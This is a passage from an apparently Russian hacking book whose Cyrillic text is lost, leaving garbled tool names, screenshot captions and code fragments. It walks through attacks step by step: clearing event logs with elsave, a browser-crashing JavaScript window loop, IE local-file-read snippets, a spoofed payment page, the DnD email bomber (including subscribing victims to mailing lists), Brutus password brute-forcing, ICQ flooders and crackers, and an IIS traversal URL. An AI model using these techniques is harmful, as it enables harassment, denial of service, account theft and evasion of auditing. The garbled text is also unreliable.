    (Event Viewer). Event Viewer ( ) (. 4.7).

    (Security Log);

    . Clear all Events ( ).

    , . 4.8, .

    Do you want to save "Security" before clearing it? Yes No Cancel

    Puc. 4.8. > (No), . .

    , ! ,

    . , elsave.exe (http://www.ibt.ku.dk/jesper/ELSave/default.htm). , ,

    Windows NT 4, Windows 2000. .

    C:\els004>elsave s \\ComputerName s , . , . elsave /? , .

    , elsave.exe . elsave.exe

    Windows ( (Start), AT MSDOS).

    System, .71


    ( , ).

    , ,

    . , , ,

    , .

    ! 50%

    ( !)

    ,

    ,

    [9].

    , , Norton Personal Firewall, PGP Desktop Security .

    ,

    ,

    , .


    5 # , , , ,

    . , , , , , .

    , 90 , . , , .

    , , , .

    , , , TCP/IP.

    , .

    , , . ,

    .

    , , ,

    (, ).

    , . , , , , Word .., , , , .

    WWW (World Wide Web ), Web (). Web , Web . 1961 , Web 1992 .

    , ,


    . Web

    Web ,

    , Web.

    Web .

    Web,

    Web URL (UniformResource Locator ),

    Web.

    ,

    Web HTTP (Hyper Text Transfer

    Protocol ).

    , Web,

    HTML (Hyper Text Markup Language

    ).

    , ,

    ,

    HTML CGI HTTP.

    Web ,

    ,

    Web, ,

    ,

    ,

    1 Web

    .

    Web , ,

    Web HTML Web,

    ( browser, ,

    , ), Web Web.

    HTML Web,

    Web,

    , , , ,

    , , , , .

    , HTML

    , Web, , Inter

    net Explorer(ff i) Netscape Navigator(NN).74


    Web

    : Web , HTML Web , , ,

    HTML, , Web? HTML?

    . ( ) , , Web.

    , DoS , Web . , , Web, , .

    open ( ), JavaScript M a i nP a g e .h tm l

    , HTML 8.1. 8.1. HTML Web

    < SCRIPTLANGUAGE* avaScript >generation();function generation(){vard=0;while (true) {

    a = new Date;

    d =a.getMilliseconds( );window.open( MainPage. html ,d, width=250,height250 );

    HTML, , . Windows2000/XP IE 5 IE 6 HTML, .


    IE 5 IE 6

    .

    tlep

    . , 8.2

    ... (

    ).

    8.2. HTML Web

    var p=external....;

    HTML 8.2 IE 5 6

    var p 8.2.

    ( [3], [10])., ,

    HTML .

    [3] HTML,

    CLSID. 8.3. HTML, .

    8.3. HTML

    8.3 IE 6 ,

    . 5.1.


    WebJQC:\Documenl.andSelling*\Alex4M>DocuroenUSWorkD...[)11

    . 5.1. HTML C:\Windows\system32\calc.exe,

    , .

    Web , JavaScript, HTML Web, . , IFRAME, Web .

    8.4 HTML, , C:\security.txt. 8.4. Web_

    C:\security.txt
    alert(" :\n"bdocumentbody nnerText;


    II.navigate("file://:/Security.txt");setTimeout('Il.navigate(nfile://C:/Security.txt")',1000);

    8.4 IE 5 IE 6

    ,

    . 5.2.

    . 5.2,

    security.txt Web.

    ,

    ,

    , JavaScript

    .

    Web

    QMd0File Edit View Favorite* Tools Help C:\security.txt

    . 5.2. Web

    NavigateComplete2, [3]. Webcaumo& Web

    , , ,

    Web

    . ,

    Web ActiveX, .

    ,

    ,

    , , ,

    , ,

    ..

    , ,

    . ,

    .


    Web

    , Web, . , , .

    , Web . , Win dows Web Microsoft

    NetBus.

    Web, . Web , . 8.7 HTML, .

    8.7. HTML

    Bubliki&Baranki

    functionfalsify(){z=window.open("about:Internet Bubliki&Baranki "); do c ume nt . o p e n();z.document.write ("


    Bubliki&Baranki VirtualAir,

    ! , Bubliki&Baranki< / H T M L > 8.7 IE 5 ,

    . 5.3.

    h t t p : / / w w w . B u b l i k i & B a r a n k i . c o r n Rog&Kopito . Web Rog&Kopito

    Bubliki&Baranki, Web Rog&Kopito .(, , .) ,

    Web Bubliki&Baranki. Web, . 5.4.

    Web . 5.4

    .

    VirtualAir

    &;1 V u t u a l A i r , ! ,. Bublild&Baranki

    . 5.3. Web Rog&Kopito

    File Edit View Favorites Tools Help

    Addre ssus) aboutlnternetMara3KHBubikilBaranki Go

    VirtualAir

    D VirtualAir

    IDons | MyComputei

    . 5.4. / VirtualAir Bubliki&Baranki


    Web

    CGI GetCardNumber, Web, Rog&Kopito:


    , .

    .

    ,

    ,

    .

    Web, , . :

    . , ,

    SSL.

    Web

    .

    .

    ,

    , ,

    . .

    ,

    . ,

    , ,

    ,

    . .

    Web .

    ,

    . ,

    , ,

    ,

    Web . , Web

    , , , , .

    , ,

    4 IE Netscape, , 5 6

    .

    , , .


    6. , ,

    , , , .

    , . , , . , , , , , ... , !

    (, , , 1, ). , , , , . ? .

    ( Flood ,) ( Spam , . Spam ). (.. ), , ,

    . ,


    SMTP.

    Death & Destruction

    Email Bomber ( & ) 4.0,

    DnD (http://www.softseek.com/Utilities/VBRUN_Files/).

    , . , DnD, . Avalanche Avalanche

    DnD, . .6.1 DnD 4.O.

    Death andDesliuclion4.0File C l o ne s He ad e r Session Random L i s t s Mailing Lilts Window E x t r a s Help

    Send bomb to:

    Say bombisfrom: ICC:pj

    |7|0 Randomly Change | EdilLMessageSubect:I

    Message Body:

    ]0RandomyChange | Edit List|SMTPSpy

    jendjombjl|EdilHeaders||Abort||Clear||Clone|fy

    Email Bombing is rarely damaging to the target but is always damaging to smtp hosts. I do NOT condone mailbombing as it causes problems for SysAdmins of servers. I did not make this program for people to blast away at each other. PLEASE use it responsibly, and if you HAVE to email bomb, then please use the option to randomly switch servers in between messages; as it lightens the loads on the server. Have fun and don't ruin a good sysadmins time by flooding his server!

    iSizeof BombIBRandomyChange[,Usagestosend:m I Edit Server listJI 1 I O Never ending bomb

    20.01.2003. use the Edit He

    Puc. 6.1. DnD DnD, , 11.

    , ( ).

    .

    .


    DnD Settings(), DnD (. . 6.1).

    Dn D Settings ()

    :

    > SMTP Host ( SMTP) , SMTP,

    . SMTP Sword2000.sword.net.

    > Spoof Host ( ) , . , .

    Randomly Change (

    ) , SMTP.

    > SMTP, Edit Server List (

    Random S e r v e i Listorca.esdIH.w||mw.highway1.c| |intetconnect.ne| lhorizQns.netstjohns.edu ]Imalasada.lava. | lpressentef.com| |cyberhighway.n|mail.sisna.com||why.net |widQwmaker.co| Iclubmet.mettob|

    wwa.comJ|nyx1G.cs.du.ed||clinet.fi j jcabletegina.co |soi.hypeichalcl rdagobert.rz.unijl lspace.net J |maple.nis.net|tka.com |Iplix.conr Idubmet.metrob|ltMvl.netihZOOO.nel |vitro,com

    Puc. 6.2. SM TP

    ). RandomServer List ( ), . 6.2.

    SMTP Random Server List ( ) . Submit().

    Size of Bomb ( ) (. 6.1) :

    # of messages to send ( ) . 10.

    Never ending bomb ( ) .


    Check the box and then fill in the information that will appear in the headers under that category; or uncheck the box to remove it from the headers.

    XMailer: | XURL: |

    XSender: |

    XDate: |QReturn Path: [QReferences: | Priority: IQXAuthenlication Warning

    | GenerateIP | |124.49.153.SO | [TedGilsdorf

    Ok Clear Cancel

    Puc. 6.5. MIME

    13 , DnD

    , .

    , ,

    .

    , Clone ()

    EMail bomb ( ) Bomber Spawn 1 (

    ), . 6.6.

    aBomber Spawn1 Sendbombto:Say bomb is from:Message Subject:

    Message Body:

    SMTP Server:

    1l 1 RandomlyChange

    | | Random |gRandomly Change

    yallnlm|I E d i t H e a d e r s|| Ab or t || Clear j[Status I

    {MessagesSent |0 |

    Puc. 6.6.


    , Bomber Spawn 1 ( ) EMailbomb ( )

    SMTP.

    ,

    SMTP.

    , !

    .

    ,

    , (

    ).

    > , Dn D Clones Load M u l t i Clones ( *

    ). Number of clones(), . 6.7

    Number of clonesHow many clones do youwantto load?

    L JPuc. 6.7.

    !

    > Number of clones ( ) ( 56) .

    Bomber Spawn ( ), 1

    .

    Send Bomb ( ) .

    & & ! ,

    ,


    ! DnD , , Mailing lists ( ). Subscribe

    joe lamer to mailing list( ), . 6.8, , Euro Queer ( ), Mormons (), Family Medicine

    ( ) !

    *i S u b s c r i b e jo elamei to a mailing list! 1=1Subscribeyourenemyto a mailing list evenworsethen amailbombMorelistscoming nextversion..sorrylor the smallquantity(hislime.My apologies for the badusab ilitybut I will use checkboxes instead of option boxesnextversion..

    Jewish List CMd Parenting Targetsemail address: [ Digital Queers GayQuakers Targetsfits name: |0hn Mormons Christianity Targets last name: | Gay/Lesbian womanism Lesbiansover 40 BiAustralians Euro Queer people FamilyMedecine Allergies

    Puc. 6.8. DnD DnD . TargetEmail Address ( ), Subscribe em() . , .

    , , DnD , , , . , Extras Pword generator ( * ). Randomic Password Generator ( ), . 6.9.

    , How many characters? (?) ( 8 ) : Use Both ( )

    , Use numbers ( ) 90


    *Randomic P a s s w o i d Geneialor Juslclick to generate arandompassword. Choose how longyou want it to beb ythenumberolcharacters.How many characters? [12 | Use Both Use numbers Use letters

    6i2i9e1m5p8i

    Close Clearbox

    Useletters ( ) . , ,

    .

    Extras ()

    69 SMTP ( SMTP Remote ( SMTP)), ( Raw Port ( )). , ( , SMTP). Other Tools( ) . , ,

    .

    , ; . , , . , ( ). , .

    . , , (IMAP) , . .

    Brutus Authentication Engine Test 2 (Brutas , 2), Brutus AET2 (http://www.hobie.net/brutus). . 6.10

    Brutus, , FTP, HTTP, Telnet

    NetBus.91


    1

    IBiulusAE T2 www.hoobie.net/biutu: (January2000) (SisJElie Tools HelpTarget |127.0.0.1 | Ti"pe|POP3 |~| | Start | Stop [ C l e a r

    Port (110 | Connections 10 Timeout}10 UseProxy|Drf||B?S..?.P.9.?.|DTrytostayconnectedfor [Unlimite||attempts

    . . .0 Use Username SingleUsef Pass Mode[Word List"p|UserFile|users.txt ||Browse|passpje jwords.txt ||Browse|

    Positive Authentication ResultsTarget I Type I Username I Password I

    5J | ) R*c AuthSeq Throttle QuickKII II ll>dle

    Puc.6.10. Brutus , Brutus ( 8 Brutus IIS). , alex1.sword.net, k o l ia . , ,

    , .

    .

    Brutus 2 (. 6.10) Target () , alex1.sword.net.

    > () , .

    Connection Options ( ) Use Proxy ( ), .

    > Authentication Options ( ) Single User( ) .


    User file ( ) , .. k o l ia .

    > Pass Mode ( ) Brute Force( ). B rutus , .6.11.

    X Bi utus 2 w w w . h o o b i e . n et / b iu l u i t (January 2 000JFile Tool. Help

    Target |alex1.sword.net

    nnectionO ptioru> o r l [110 | ConnectionsType| P OP 3 [T|| Start|Slop | Clear |

    I 10 Timeout I 10 Use Proxy I DefineIPSOptions

    | Modifysequence|T r y toslayconnectedfor|Untml8|r| attemptsAuthenticationOptions

    0 UseUsemame 0Single UserUserlD | kolia

    Pass Mode[BruteForce|1 |[Kange|||Dfellfcuted |

    Positive AuthenticationResultsTarget I Type I Username|P a ssw or d |

    Rtet AuthStq Throttle QuickKil

    Puc. 6.11. Brutus POPS Range(). Range () Brutus BruteForce Generation (Brutus ),

    .6.12.BiutusBiuleFoiceGeneration

    Digits only

    Lowercase Alpha

    Uppercase Alpha

    Mixed Alpha

    Alphanumeric

    FullKeyspace

    MinLength[Max Length [4 [T

    Cancel

    Custom Range |etaoinsrhldcumfpgwybvkxjqzl234567890! |

    Puc. 6.12.


    Brutus Brute Force Generation (Brutus ) , , . , , M in Length ( ) 3, Max Length( ) 4. , Digits only

    ( ). .

    > Start () Brutus 2 Brutus 2. . 6.13.

    X Uiutus 2 w w w . h o o b i e . n e t / b i u t u s [Januaiy2000JFile Took Help

    1 = 1 Target|alex1.sword.net Type|POP3 EJ| Start | Stop | Clear|

    iConnectionOption*Port [110 | ConnectionsI

    10 Timeout 10

    rPOl

    I ?P3Options

    | Modifysequence | D Trytostayconnectedfor|Unimte| >| attemptsAuthenticationOptions

    El Use Username 0 Single UserUserlD [kolia

    PassMode [Brute Force[ I Range DisllbAedPositive Authentication Results

    Target I Type | Usernamealex1.sword.net POP3 kolia I Password I0007

    Positive authentication atalex1 .sword.netwith User: kolia Password: 0007(10997attempts

    10997 Uikolia P:0000Timeout Reject

    ~]|37Attemptsper second | Throttle Quick IdlePuc. 6.13. 1.

    Positive Authentication Results ( ) , kolia 0007. , Brutus 10997 alex1.sword.net ( 11000). 5 Pentium 3 1000 , Ethernet 10 /.

    ,

    , Brutus ( 94


    ). , , , ( 8 ), , (, &$ ..). ! Brutus Brute Force Generation (Brutus ) 8 ,

    Full Keyspace ( ). Start() Brutus 2 6 095 689 385 410 816 , !

    12 ?

    , , , (., , [10]). Brutus,

    PassMode ( ). ( 100 000), , . , password, p a r o l , MyPassword Web

    .

    , , , Ethernet, 3050 / ( ). . , , , , .

    . , , , , , . . , .


    IIS Brutus 8 , . , , . , , ,

    , ! : . .

    , , , . 1, , , , . , , , , . , ( ),

    .

    , , . . , TFTP 11 , 11 . , TFTP , . TFTP , ,

    , . , , , , , .

    . , ,


    ( ) . , , , Web .. ( , ).

    . , , ,

    . . , .. , , , . , ..

    , . , 2002 ., , , . Web. . . . .. ( ). Web, , ?, . , , ?, ?, ? . , , , , . , , , , ,

    . , , , , repa_parenaia, !

    . , ,

    , ,

    . 97


    , , ,

    , .

    .

    ,

    .

    ,

    . , (

    ) ,

    .

    ,

    8 ( 12) , , .

    ,

    Dn D. .

    ,

    , Norton Antivirus

    M a c A f e e VirusScan. ,

    PGP Desktop Security.

    ,

    .

    , , , , .

    , .


    7 .

    ICQ ICQ Intelligent Call Query,

    .

    ICQ [] : I Seek You ; , ICQ . ICQ

    ,

    1998 Mirabilis,

    ( 40 ) AOL.

    ICQ ,

    ICQ ,

    , .

    , , ICQ,

    ,

    . , , .

    ICQ ,

    ICQ.

    ICQ , ICQ, ,

    http://www.ICQ.com, http://mirabilis.com. ICQ ICQ , ,1998,1999,2000,2002, ICQ 2003. ICQ

    UDP, 4000,

    TCP, .

    , ICQ,

    UIN(Unique Identification Number ). UTN ICQ ,

    .

    , ICQ?

    ICQ ,

    . , ? .


    , ICQ, . ,

    ICQ ICQ .

    , ICQ,: , UIN ,

    , . , ICQ , ICQ . , , .

    I C Q , , IP I C Q , , . ,

    , DoS, 9 . , IP ICQ, , I CQ .

    ! , I C Q , . , , ,

    , .

    ICQ, Mirabilis . ICQ,

    ICQ , .

    , .


    ICQ

    ICQ

    . , ICQ

    ICQ ICQ. , ICQ ;

    , I C Q (, LameToy www.mirabilis.com). , ( ) , .

    , , ,

    , , . , ICQ.

    . . Sword2000

    IC Q Gro upwar e Serve r, A l e x ICQ Groupware Client, UESf, 1001, 11 , UIN, 1003. ICQ Groupware http://www.icq.com. ICQ, ICQGroupware, , , 1. , ICQ , ICQ . ICQ I CQ ,IC Q , I C Q .


    UIN ICQ UIN ICQ, , UIN . UIN . , , . , .

    , , . ( ) LameToy for ICQ(DBKILLER), , , ( http://icq.cracks.ru/attack.shtml). LameToy for ICQ , , .

    LameToy for ICQ. . 7.1 , LameToy for ICQ.

    LameToy Fo r Ic q [ D B K I L L E R ] 1| Send [ Slop | | Update; | Menu | | Hide [f ExitLoseiL L M Z . JQ044JI P o t t Scarmei|

    Selling [NormalMessageMUlNSniffer

    1 I GetLocalIP11501[SendeimiNBIiOOlIPasswdL l|URL|hHp:/VMesssage

    Puc . 7.1. LameToy for ICQ DBKILLER) ICQ

    LameToy for ICQ (DBKILLER) Send (). , Setting() Loop () , . UIN, UIN# Ran (Random 102


    ICQ ). , , , , .

    , ICQ, , UIN UIN. , ICQ (ICQ99a

    ICQ99b) . DB( ) , DB Data Base , , DB NewDB. LameToy , DB killer ( DB) Setting (). ICQ,

    .

    , , LameToy, UIN , , , System Messenger ICQ Team ( h t t p : / / w w w . i c q i n f o . r u / s o f tj c q t e a m . s h t m l ) , ICQ Sucker .

    lf~ac)pecaICQ DoS ( ) , . , , , Advanced ICQ IPSn iffe r ICQ Team ( Web, , http://www.icqinfo.ru/sofl_icqteam.shtml). . 7.2 Advanced ICQ IP Sn iffer.

    Adv anced ICQ IP Sniffer aaa'Your UIN: [207685174|Password:IJUIN to check: |123456783 Clear list Saver

    Cheek Timeout.Tiyagain.

    ExtIP:|

    Status: || IntIP: ||TCPFIa9: |

    | TC PPott: |0| TCPVersion: |0

    Puc. 7.2. IP ICQ


    IP ICQ UIN, Advanced ICQ IPSniffer ICQ, UIN . , , Your UIN( UIN) Password() Advanced ICQ IP Sniffer ( ICQ). Check () , ICQ

    UTN , Info() . , Info () . 7.2 , ( ) IP ICQ, TCP, ICQ . , , Ext IP ( ), IntIP ( IP) TCP Port ( TCP). , ICQ ( ). ICQ, Advanced IP ICQ Sniffer,

    ICQserver's address and port( ICQ), Server () .7.3.

    ICQ server'saddress andport 3Address: licq.rnirdbilis.com

    Port: [4000 || | OK|

    | Cancel |

    . 7 . . ICQ server's addressandport( ICQ) ICQserver's ad

    dress and port ( ICQ) Mirab ilis ICQ 4000. , / IP / .

    ICQ, , , I C Q , I C Q ICQ. , ,

    . , ICQ, ICQMult iWar(http://www.paybackproductions.com/), ICQ Flooder(.7.4).


    I C Q

    ICQ F l o o d e rFile

    Victim'saddress: 127.0.0.1 | ICQ Port [1027El Randomly generated UINAppatenlsource UIN:QNo.ol Messages: |1 [Message:

    E at this!

    ICO Flooder 1.2 Copyright (C) 1998dphmanand Implant ManPuc. 7.4. ICQ

    ICQ Flooder, .> V i c t im ' s address ( ) IP

    ICQ.

    > ICQport ( ICQ) TCP.> , UIN .

    :

    U T N Randomly generated UIN( UIN), UIN UIN.

    UIN Apparent source UIN( UIN ) UIN, ICQ .

    No. of Messages ( ) ICQ.

    > Message () ( , ).

    > Send! () .

    , ICQ, ,

    ,, 105


    http://mht.hut.ru/icq/icq.html, ( , ,

    ICQ , ).

    ICQ ,

    , , ! ICQ ICQ,

    ICQ,

    ,

    . ,

    ,

    .

    , , ICQ subMachineGun v1.4 (http://icq.cracks.ru/best.shtml), . 7.5.

    OICOSubMachineGunv l . 4by uDFile Settings About[Bruteforce]

    [...[13Single[~~]Single

    About

    Agent

    Force!

    ||(c)uD .Moscow 2 Q O 1Puc. 7.5. ICQ subMachineGun

    U1N ICQ


    ICQ

    bruteforce , ,

    .

    . ICQ ICQ subMachineGun .

    > ICQ subMachineGun.> Settings * Connections&Cracking (

    &). , . 7.6.

    icq server port

    [ Cracking]13Stop ifsuccessful... Make log of cracked uins0 Reconnect if timeout0 Cut passwds length to 8 digits

    settimeout:relogln ; times

    Cancel OKPuc. 7.6. U1N

    icq server( ICQ) ICQ,

    , I C Q L m i r a b i li s. s e r v e r . port ()

    4000.

    Cracking () :

    Stop if successful ( ) ICQ.

    Make log if cracked uins ( UIN) ICQ.


    Reconnect if timeout ( ) ICQ .

    Cut password length to 8 digits ( 8 ) 8 .

    > set timeout ( ) 15 .

    > relogin ( ) ICQ 3.

    ICQ s u b M a c h i n e G u n UIN . .

    > ICQ subMachineGun Bruteforce( ) UIN. . Single

    () UIN, .

    Single() UIN.

    UIN, (...) Making victims list ( ),

    . 7.7.

    Making victims list ( ) Range () , , UIN( 100000) ( 900900).

    IHint:use Del to remove uins from listPuc. 7.7.

    UIN

    step () UIN ( 100). Generate() UIN; .


    ICQ

    , Generate () UIN, , , .. Add () U IN .> UIN,

    Open () UIN ( UIN ).

    > UIN , t0*" . Clear () UIN ( ).

    UIN, . .

    > ICQ s u b M a c h i n e G u n Bruteforce ( ) . .

    Single ()

    , .

    Single () .

    , (...) Make passlist( ), . 7.8.

    Make passlist ( )

    .> Open ()

    ( ). , ICQ.

    Use Del to remove passwords fromlistPuc. 7.8.

    v Generato r ( ) Add (). , .


    > ,

    0*"**]. Clear() ( ).

    > , . .

    Force (). , ICQsubMachineGunv1.4 (. 7.9).OICQ SubMachineGunv l 4 byu DFile Settings About

    [Bruteforce][] 0 Single[~~] D Single

    Abo ut

    Agent

    Puc. 7.9.

    ICQ subMachineGunv1.4, UIN, ( , . 7.9 ). , , 15 , ICQ. 45 , ( ). ,

    , , , , .. . ...110


    ICQ

    ( , , ICQ . ICQ , ICQ

    . , ? ! , ? , ICQ , . , .

    ? , Windows. , . , ICQ , ICQ. I C Q , , ElcomSoft Advanced ICQ Password Recovery(http://www.elcomsoft.com).

    , . . 7.10 Advanced ICQ PasswordRecovery.

    31.01.20032:05ACQPR1.0launched,registeredversion

    6.COPR1.0(cl2000PleaGoriunovandAndy Malvshev.ElcomSoflCo. LPuc. 7.10. ICQ .dat

    ICQ, Advanced ICQ Password Recovery ( ICQ) .dat, ICQ.


    ICQ Password successfully found !

    ICQ version:99b2000bUINpassword:

    %CopytoClipboard fij ClosePuc. 7 .11 .

    !

    , , ICQ2002 2002. 2002 , UIN .dat,.., , 207685174.dat

    (207685174 UIN ). ICQ Password successfully found! ( ICQ ), (.7.11). . 7.11, ICQ 99b 2000b, ICQ 2002 ( ).

    , ICQ , , ICQ . , ,

    (.[11]), Web (. 8). , , , .

    , ICQ( ) , . , , , ICQ. , , ICQ , . , .

    ICQ, . . , , I C Q

    ICQ . , ICQ , UIN .


    ICQ

    ?

    , , ,

    ,

    . ,

    , , , , , , ,

    . ICQ , , ,

    ,

    , ,

    , ,

    .

    ,.. ICQ, , ,

    . ,

    ICQ ICQ,

    ICQ ( , ICQ Team

    (http://www.lcqteam.com)). I C Q ICQ, ICQ ICQ.

    , .

    , ? ,

    , . ,

    ,

    ? , ... , ,

    , .

    ICQ,

    ,

    .

    ICQ , .

    ICQ ,


    ICQ. ICQ

    DoS ... .

    ICQ

    . , ,

    ICQ, ICQ, I C Q . ICQ,

    ICQ. IP

    , ,

    ICQ.

    ICQ .

    , ICQ, UTN

    . , ICQ, , , BlacklCE Defender, DoS.

    , , .

    ,

    . ,

    ICQ

    .

    , ICQ, ICQ.

    , IP ICQ,

    . ,

    .

    , . ICQ

    , PGP Desktop Security 2.9,

    ICQ . ,

    PGP ( [7]).


    8. Webcaumoft Web? , Web ,

    . Web , Web . , , , .

    , Web , , , , . HTML Web ( ), , . HTML . ( ).

    , Web, ,Web, , . HTTP, , , . Web, , .

    , Web, DoS , , Yahoo. , Web,

    , ( ) Web , . Web , .

    W e b~ caum a Web Web , , Web, Web,


    , .

    Web Web, Web . Web ,

    Web, Web . Web

    , .

    Web Web,, Internet Explorer (ffi), HTML Web, HTTP, Web.

    Web , IIS Microsoft, Apache HTTP Server Apache Software Foundation

    . Web, ASP (Active Server Page ) CGI, , Java SUN, Apache Software Foundation . Web, Web, , . SQL Microsoft, Oracle Oracle .

    , , , ODBC (Open Data Base Connectivity

    ). , , , , , ...

    ?

    1 Web~cauma , Web, . , .


    Web

    Web , , , , , Web .

    Web Web , , TCP 80, , Web,

    ( CVE, Web),

    Web .

    Web ASP, Java, CGI , .

    Web , , , , ( ). , , .

    , , (cookie), , .

    Web

    , , . , , C G I , CGI , , , .

    ,

    Web , . , Web

    , , , .

    , , , Web, Web, .

    , (, . [])., , ,

    , IIS 5. , 117


    ( HTTP), C G I ( ) Web

    ( Web). Web , . IIS , Web, .

    , Web , , . , Web. . , FTP

    , , .

    , .

    Web .

    Web~cauma , Web, . , , , , .

    , , . ,

    Web , , , DNS, .

    Web.

    , .


    Web

    c p Web

    .

    .

    , ,

    ,

    .

    IP, , ,

    . Whols . , HTML

    Web . HTML

    , Web,

    , .

    , ,

    , , JavaScript .

    , HTML Web

    Web Teleport Pro., , Whols , ,

    Web.

    w h o i s( Unix), Web ,

    whois Web.

    W h o l s . , ,

    . 1999

    Network Solution (http://www.networksolution.com),

    , , InterNic(http://www.internic.net).

    / . Web,

    Whois ( ),

    . Whois , ,


    , DNS. , RIPE NCC (Network Coordinate Center ), IP

    . Web RIPE NCC (http://www.ripe.net), .8.1.

    t@T1Aqp9c|fehltp://www.ripB.net/npen^^ub^^c^ El^|

    . 8.1. Web RIPE NCC

    IP Web

    ? DNS .

    , SuperScan (http://www.foundstone.com), . 8.2.

    SuperScan, .

    > Start () .> Stop () .

    > Scan type ( ) All list ports from( ).

    > Start().


    Web

    StarlfTMTStop|l.0.0.5

    0 Ignore IP zero0 Ignore IP 255Extract from He

    Timeout

    P'ng|400|Conned

    |2000 |Read

    14000 I

    Resolvehoslnames121 Onlyscan responsive pings[3 Showhost responses Ping only

    Every portinlis All selected ports in list(5 All list p o e t s from A l l p o r t s f r om

    5 E Z B

    . 8.2.

    SuperScan . , IP 1.0.0.1 HTTP I I S 5.0, Web. ( ), .

    6 shares found on 1 remote hosts.wa 1 . 0 . 0 , 1MyDocumentsN E T L O G O ND

    TeslMyDownloadsSYSVOL

    M.0.0.1SMyDocumentsM.O.(mNETLOGONM.0.0.1\DM.0.0.1\Tesl.DownloadsM.0.0.1\SYSVOL

    Map Drive

    . 8.. I I S 5121


    Legion (http://packetstormsecurity.org/groups/rhinoS), 1.0.0.1 . 8.3., IIS 5, ,

    ? .

    II5| I I S , HTTP (Hypertext Transfer Protocol

    ) CGI (Com mon Ga teway Interface ), I I S , .

    HTTP , , [12], Web

    . HTTP , GET. Web (, ), GET, , ,http://www.anyserver.com/documents/order.html. order.html /documents IIS,

    c:\inetpub\wwwroot\documents.

    CGI , , [12], . HTTP, :

    http://www.anysite.com/scripts/MyScript?napaMeTp1+napaMeTp2MyScript , /scripts IIS, a ?1+2 , MyScript. I I S , , , .

    CGI, ASP(Active Server Pages ) ISAPI (Internet ServerProgramming Interface ). ASP :

    http://www .anysite.com/scripts/MyScripts7napaMeTp1 =1& 2=2


    Web

    MyScript.asp, , , HTML. ISAPI

    , ISAPI.

    HTTP:

    http://www.anysite.com/isapi.111?1&2, IIS, , .

    HTTP ,

    II S . II S 2.0 :http://www.anysite.eom/.7.7.7.7.7winnt/secret.file Web , secret.txt.

    Windows,

    ACL.

    IIS , Web

    [3]. IIS

    , ,

    , , ,

    SecurityLab.ru (http://www.securitylab.ru).

    IIS, netcat (http://www.atstake.com), (netcat

    [3] netc